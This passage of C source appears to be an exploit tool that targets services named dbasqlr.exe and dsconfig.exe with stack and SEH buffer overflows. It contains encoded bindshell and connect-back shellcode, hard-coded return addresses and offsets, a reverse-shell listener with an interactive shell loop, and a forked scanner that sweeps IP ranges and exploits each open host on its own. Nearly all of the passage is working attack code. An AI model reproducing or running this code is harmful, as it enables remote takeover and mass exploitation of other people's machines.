\\x94\"\r\n\"\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\"\r\n\"\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\"\r\n\"\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\"\r\n\"\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\"\r\n\"\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\"\r\n\"\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\"\r\n\"\\x80\\x2f\\xa2\\x04\";\r\n\r\n/*\r\n * Type : connect back shellcode\r\n * Length: 316 bytes\r\n * CBIP : reverseshell[111] ( ^ 0x99999999 )\r\n * CBPort: reverseshell[118] ( ^ 0x9999 )\r\n *\r\n */\r\n\r\nunsigned char reverseshell[] =\r\n\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"\r\n\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\"\r\n\"\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\"\r\n\"\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\"\r\n\"\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\"\r\n\"\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\"\r\n\"\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\"\r\n\"\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\"\r\n\"\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\"\r\n\"\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\"\r\n\"\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\"\r\n\"\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\"\r\n\"\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\"\r\n\"\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\"\r\n\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"\r\n\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\"\r\n\"\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\"\r\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\r\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\r\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\r\n\r\nunsigned char greetz[] =\r\n\"\\x20\\x41\\x54\\x20\\x4c\\x45\\x41\\x53\\x54\\x20\\x53\\x4f\\x4d\\x45\\x20\\x47\"\r\n\"\\x52\\x45\\x45\\x54\\x5a\\x20\\x46\\x4c\\x59\\x20\\x54\\x4f\\x3a\\x20\\x48\\x44\"\r\n\"\\x4d\\x2c\\x20\\x54\\x48\\x43\\x2c\\x20\\x41\\x4e\\x44\\x20\\x43\\x41\\x20\\x4f\"\r\n\"\\x46\\x20\\x43\\x4f\\x55\\x52\\x53\\x45\\x20\\x3a\\x29\\x20\\x2d\\x20\\x43\\x59\"\r\n\"\\x42\\x45\\x52\\x54\\x52\\x4f\\x4e\\x49\\x43\\x20\";\r\n\r\n/*\r\n *\r\n * structures\r\n *\r\n */\r\n\r\ntypedef struct _args {\r\n\tchar* tip;\r\n\tchar* lip;\r\n\tint tport;\r\n\tint lport;;\r\n} args;\r\n\r\n/*\r\n *\r\n * functions\r\n *\r\n */\r\n\r\nint\r\nconnect_to_remote_host ( char* tip, unsigned short tport )\r\n{\r\n\tint s;\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct hostent* host_addr;\r\n\r\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\r\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\r\n\t{\r\n\t\tprintf ( \"cannot resolve \\\"%s\\\"\\n\", tip );\r\n\t\texit ( 1 );\r\n\t}\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_port = htons ( tport );\r\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"--[ connecting to %s:%u...\", tip, tport );\r\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"done!\\n\" );\r\n\treturn ( s );\r\n}\r\n\r\nint\r\nexploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\r\n{\r\n\tunsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll\r\n\tchar buffer[3289];\r\n\r\n\tbzero ( &buffer, sizeof ( buffer ) );\r\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\r\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\r\n\tmemcpy ( buffer + 1337, \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", 6 ); //good code <-------.\r\n\tmemcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); // |\r\n\tmemcpy ( buffer + 3172, \"\\xe9\\xd0\\xf8\\xff\\xff\", 5 ); //jmp back 1840 bytes --'\r\n\r\n\tif ( option == 0 )\r\n\t{\r\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\r\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\r\n\t\tmemcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );\r\n\t}\r\n\telse\r\n\t\tmemcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );\r\n\r\n\tprintf ( \"--[ exploiting \" YELLOW \"dbasqlr.exe\" NORMAL\"...\\n\" );\r\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\r\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\treturn ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tsleep ( 1 );\r\n\tclose ( s );\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nexploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\r\n{\r\n\tchar buffer[4129];\r\n\r\n\tbzero ( &buffer, sizeof ( buffer ) );\r\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\r\n\r\n\tbuffer[ 0] = 0x9b;\r\n\tbuffer[ 1] = 0x53; //S\r\n\tbuffer[ 2] = 0x45; //E\r\n\tbuffer[ 3] = 0x52; //R\r\n\tbuffer[ 4] = 0x56; //V\r\n\tbuffer[ 5] = 0x49; //I\r\n\tbuffer[ 6] = 0x43; //C\r\n\tbuffer[ 7] = 0x45; //E\r\n\tbuffer[ 8] = 0x50; //P\r\n\tbuffer[ 9] = 0x43; //C\r\n\tbuffer[10] = 0x18;\r\n\tbuffer[11] = 0x01;\r\n\tbuffer[12] = 0x02;\r\n\tbuffer[13] = 0x03;\r\n\tbuffer[14] = 0x04;\r\n\tbuffer[15] = 0x53; //S\r\n\tbuffer[16] = 0x45; //E\r\n\tbuffer[17] = 0x52; //R\r\n\tbuffer[18] = 0x56; //V\r\n\tbuffer[19] = 0x49; //I\r\n\tbuffer[20] = 0x43; //C\r\n\tbuffer[21] = 0x45; //E\r\n\tbuffer[22] = 0x50; //P\r\n\tbuffer[23] = 0x43; //C\r\n\tbuffer[24] = 0x01;\r\n\tbuffer[25] = 0x0c;\r\n\tbuffer[26] = 0x6c;\r\n\tbuffer[27] = 0x93;\r\n\tbuffer[28] = 0xce;\r\n\tbuffer[29] = 0x18;\r\n\tbuffer[30] = 0x18;\r\n\r\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\r\n\tmemcpy ( buffer + 1056, \"\\xeb\\x06\", 2 );\r\n\tmemcpy ( buffer + 1060, \"\\x14\\x57\\x80\\x23\", 4 ); //SEH\r\n\tif ( option == 0 )\r\n\t{\r\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\r\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\r\n\t\tmemcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );\r\n\t}\r\n\telse\r\n\t\tmemcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );\r\n\r\n\tprintf ( \"--[ exploiting \" YELLOW \"dsconfig.exe\" NORMAL \"...\\n\" );\r\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\r\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\treturn ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tsleep ( 1 );\r\n\tclose ( s );\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nisip ( char *ip )\r\n{\r\n\tint a, b, c, d;\r\n\r\n\tif ( !sscanf ( ip, \"%d.%d.%d.%d\", &a, &b, &c, &d ) )\r\n\t\treturn ( 0 );\r\n\tif ( a < 1 )\r\n\t\treturn ( 0 );\r\n\tif ( a > 255 )\r\n\t\treturn 0;\r\n\tif ( b < 0 )\r\n\t\treturn 0;\r\n\tif ( b > 255 )\r\n\t\treturn 0;\r\n\tif ( c < 0 )\r\n\t\treturn 0;\r\n\tif ( c > 255 )\r\n\t\treturn 0;\r\n\tif ( d < 0 )\r\n\t\treturn 0;\r\n\tif ( d > 255 )\r\n\t\treturn 0;\r\n\treturn 1;\r\n}\r\n\r\nint\r\nis_open ( char* ip, unsigned short tport )\r\n{\r\n\tint s, n, error;\r\n\tint flags;\r\n\tint sec = 0; //change this for wan\r\n\tunsigned long usec = 10000; //works fine on my lan\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct timeval tval;\r\n\tfd_set rset, wset;\r\n\tsocklen_t len;\r\n\r\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_port = htons ( tport );\r\n\tinet_pton ( AF_INET, ip, &remote_addr.sin_addr );\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( -1 );\r\n\t}\r\n\r\n\tif ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )\r\n\t{\r\n\t\tclose ( s );\r\n\t\treturn ( -1 );\r\n\t}\r\n\tif ( fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )\r\n\t{\r\n\t\tclose ( s );\r\n\t\treturn ( -1 );\r\n\t}\r\n\tif ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) == -1 )\r\n\t{\r\n\t\tif ( errno != EINPROGRESS )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\t}\r\n\tif ( n == 0 )\r\n\t\tgoto done; /* connect completed immediately */\r\n\tFD_ZERO ( &rset );\r\n\tFD_SET ( s, &rset );\r\n\twset = rset;\r\n\ttval.tv_sec = sec;\r\n\ttval.tv_usec = usec;\r\n\r\n\tif ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )\r\n\t{\r\n\t\tclose ( s ); /* timeout */\r\n\t\terrno = ETIMEDOUT;\r\n\t\treturn ( 1 );\r\n\t}\r\n\tif ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )\r\n\t{\r\n\t\tlen = sizeof ( error );\r\n\t\tif ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )\r\n\t\t\treturn ( -1 );\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprintf ( \"select failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tdone:\r\n\t\tif ( fcntl ( s, F_SETFL, flags ) < 0 )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\t\tif ( error )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\terrno = error;\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nselect_action ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ choose\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = start scanner\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = send some greetings to ca\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nselect_shellcode ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select shellcode\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = bindshell\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = reverseshell\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid shellcode!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nselect_vulnerability ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select vulnerability\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = dsconfig\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nshell ( int s, char* tip, unsigned short cbport )\r\n{\r\n\tint n;\r\n\tchar buffer[2048];\r\n\tfd_set fd_read;\r\n\r\n\tprintf ( \"--[\" YELLOW \" b\" NORMAL \"0\" YELLOW \"x \" NORMAL \"p\" YELLOW \"w\" NORMAL \"n\" YELLOW \"e\" NORMAL \"d \" YELLOW \"- \" NORMAL \"h\" YELLOW \"4\" NORMAL \"v\" YELLOW \"e \" NORMAL \"p\" YELLOW \"h\" NORMAL \"u\" YELLOW \"n\" NORMAL \"\\n\" );\r\n\r\n\tFD_ZERO ( &fd_read );\r\n\tFD_SET ( s, &fd_read );\r\n\tFD_SET ( 0, &fd_read );\r\n\r\n\twhile ( 1 )\r\n\t{\r\n\t\tFD_SET ( s, &fd_read );\r\n\t\tFD_SET ( 0, &fd_read );\r\n\r\n\t\tif ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )\r\n\t\t\tbreak;\r\n\t\tif ( FD_ISSET ( s, &fd_read ) )\r\n\t\t{\r\n\t\t\tif ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tif ( write ( 1, buffer, n ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif ( FD_ISSET ( 0, &fd_read ) )\r\n\t\t{\r\n\t\t\tif ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tif ( send ( s, buffer, n, 0 ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t}\r\n\t\tusleep(10);\r\n\t}\r\n}\r\n\r\nvoid\r\nconnect_to_bindshell ( char* tip, unsigned short bport )\r\n{\r\n\tint s;\r\n\tint sec = 5; // change this for fast targets\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct hostent* host_addr;\r\n\r\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\r\n\t{\r\n\t\tfprintf ( stderr, \"cannot resolve \\\"%s\\\"\\n\", tip );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n\tremote_addr.sin_port = htons ( bport );\r\n\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"--[ sleeping %d seconds...\\n\", sec );\r\n\tfall_asleep ( sec );\r\n\tprintf ( \"--[ connecting to %s:%u...\", tip, bport );\r\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\\n\" NORMAL);\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tshell ( s, tip, bport );\r\n}\r\n\r\nvoid\r\nfall_asleep ( int sec )\r\n{\r\n\tsleep ( sec );\r\n}\r\n\r\nvoid\r\nheader ()\r\n{\r\n\tprintf ( YELLOW \" __ __ _ \\n\" );\r\n\tprintf ( \" _______ __/ /_ ___ _____/ /__________ ____ (_)____ \\n\" );\r\n\tprintf ( \" / ___/ / / / __ \\\\/ _ \\\\/ ___/ __/ ___/ __ \\\\/ __ \\\\/ / ___/ \\n\" );\r\n\tprintf ( \"/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \\n\" );\r\n\tprintf ( \"\\\\___/\\\\__, /_.___/\\\\___/_/ \\\\__/_/ \\\\____/_/ /_/_/\\\\___/ \\n\" );\r\n\tprintf ( \" /____/ \\n\\n\" NORMAL );\r\n\tprintf ( \"--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\\n\" );\r\n}\r\n\r\nvoid\r\nparse_arguments ( int argc, char* argv[], args* argp )\r\n{\r\n\tint i = 0;\r\n\r\n\twhile ( ( i = getopt ( argc, argv, \"t:l:p:\" ) ) != -1 )\r\n\t{\r\n\t\tswitch ( i )\r\n\t\t{\r\n\t\t\tcase 't':\r\n\t\t\t\targp->tip = optarg;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\targp->lip = optarg;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'p':\r\n\t\t\t\targp->lport = atoi ( optarg );\r\n\t\t\t\tbreak;\r\n\t\t\tcase ':':\r\n\t\t\tcase '?':\r\n\t\t\tdefault:\r\n\t\t\t\tusage ( argv[0] );\r\n\t }\r\n }\r\n\r\n if ( argp->tip == NULL || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 )\r\n\t\tusage ( argv[0] );\r\n}\r\n\r\nvoid\r\nstart_reverse_handler ( int cbport )\r\n{\r\n\tint s1, s2;\r\n\tstruct sockaddr_in cliaddr, servaddr;\r\n\tsocklen_t clilen = sizeof ( cliaddr );\r\n\r\n\tbzero ( &servaddr, sizeof ( servaddr ) );\r\n\tservaddr.sin_family = AF_INET;\r\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\r\n\tservaddr.sin_port = htons ( cbport );\r\n\r\n\tprintf ( \"--[ starting reverse handler [port: %u]...\", cbport );\r\n\tif ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\r\n\tif ( listen ( s1, 1 ) == -1 )\r\n\t{\r\n\t\tprintf ( \"listen failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tif ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"accept failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tclose ( s1 );\r\n\tprintf ( \"--[ incomming connection from:\\t\" YELLOW \" %s\\n\" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );\r\n\tshell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );\r\n\tclose ( s2 );\r\n}\r\n\r\nvoid\r\nstart_scanner ( args* argp )\r\n{\r\n\tint i;\r\n\tint s;\r\n\tint fd;\r\n\tint sc;\r\n\tint option;\r\n\tint ip1 = 0, a = 0;\r\n\tint ip2 = 0, b = 0;\r\n\tint ip3 = 0, c = 0;\r\n\tint ip4 = 0, d = 0;\r\n\tint status = 0;\r\n\tchar scan_ip[256];\r\n\tchar end_ip[256];\r\n\tchar line[256];\r\n\tchar system_time[64];\r\n\tunsigned short port;\r\n\tunsigned short xoredcbport;\r\n\tunsigned long BRUTE_DELAY = 100000;\r\n\tunsigned long MAX_CHILDS = 40;\r\n\tunsigned long xoredcbip;\r\n\ttime_t ticks = time ( NULL );\r\n\r\n\tbzero ( &scan_ip, sizeof ( scan_ip ) );\r\n\tbzero ( &end_ip, sizeof ( end_ip ) );\r\n\tbzero ( &system_time, sizeof ( system_time ) );\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ enter IP-range\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"start-ip\" RED \"]\" NORMAL );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%s\", scan_ip );\r\n\tsscanf ( scan_ip, \"%u.%u.%u.%u\", &ip1, &ip2, &ip3, &ip4 );\r\n\tif ( !isip ( scan_ip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"end-ip \" RED \"]\" NORMAL );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%s\", end_ip );\r\n\tsscanf ( end_ip, \"%u.%u.%u.%u\", &a, &b, &c, &d );\r\n\tif ( !isip ( end_ip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select port to scan for\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \" 6070\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"41523\" RED \"]\" NORMAL \" = dsconfig\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%u\", &port );\r\n\tif ( port != 6070 && port != 41523 )\r\n\t{\r\n\t\tprintf ( \"--[ I`m only scanning for port 6070 and 41523!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ I can try to exploit the bug, shall I ?\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" yes, try it!\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" no, i`am on my own!\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%u\", &option );\r\n\tif ( option != 0 && option != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tif ( option == 0 )\r\n\t\tsc = select_shellcode ();\r\n\r\n\tif ( ( fd = open ( \"scan.log\", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"open failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tsnprintf ( system_time, sizeof ( system_time ) -1, \"\\nDate: %s\\n\\n\", ctime ( &ticks ) );\r\n\tif ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tprintf ( \"\\noO---[ scanner - scan.log ]---Oo\\n\\n\" );\r\n\r\n\twhile ( 1 )\r\n\t{\r\n\t\tif ( ip3 > 254 ) { ip3 = 1; ip2++; }\r\n\t\tif ( ip2 > 254 ) { ip2 = 1; ip1++; }\r\n\t\tif ( ip1 > 254 )\r\n\t\t\texit ( 0 );\r\n\r\n\t\tfor ( ip4; ip4 < 255; ip4++ )\r\n\t\t{\r\n\t\t\ti++;\r\n\t\t\tbzero ( &scan_ip, sizeof ( scan_ip ) );\r\n\t\t\tsnprintf ( scan_ip, sizeof ( scan_ip ) -1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4 );\r\n\t\t\tusleep ( BRUTE_DELAY );\r\n\t\t\tswitch ( fork () )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tswitch ( is_open ( scan_ip, port ) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tcase 0:\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" GREEN \"open\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbzero ( &line, sizeof ( line ) );\r\n\t\t\t\t\t\t\tsnprintf ( line, sizeof ( line ) -1, \"[%s:%d]\\n\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tif ( write ( fd, line, strlen ( line ) -1 ) <= 0 )\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tif ( option == 0 )\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\r\n\t\t\t\t\t\t\t\tprintf ( \"oO---[ exploitation ]---Oo\\n\" );\r\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\r\n\t\t\t\t\t\t\t\ts = connect_to_remote_host ( scan_ip, port );\r\n\t\t\t\t\t\t\t\tswitch( sc )\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tcase 0:\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 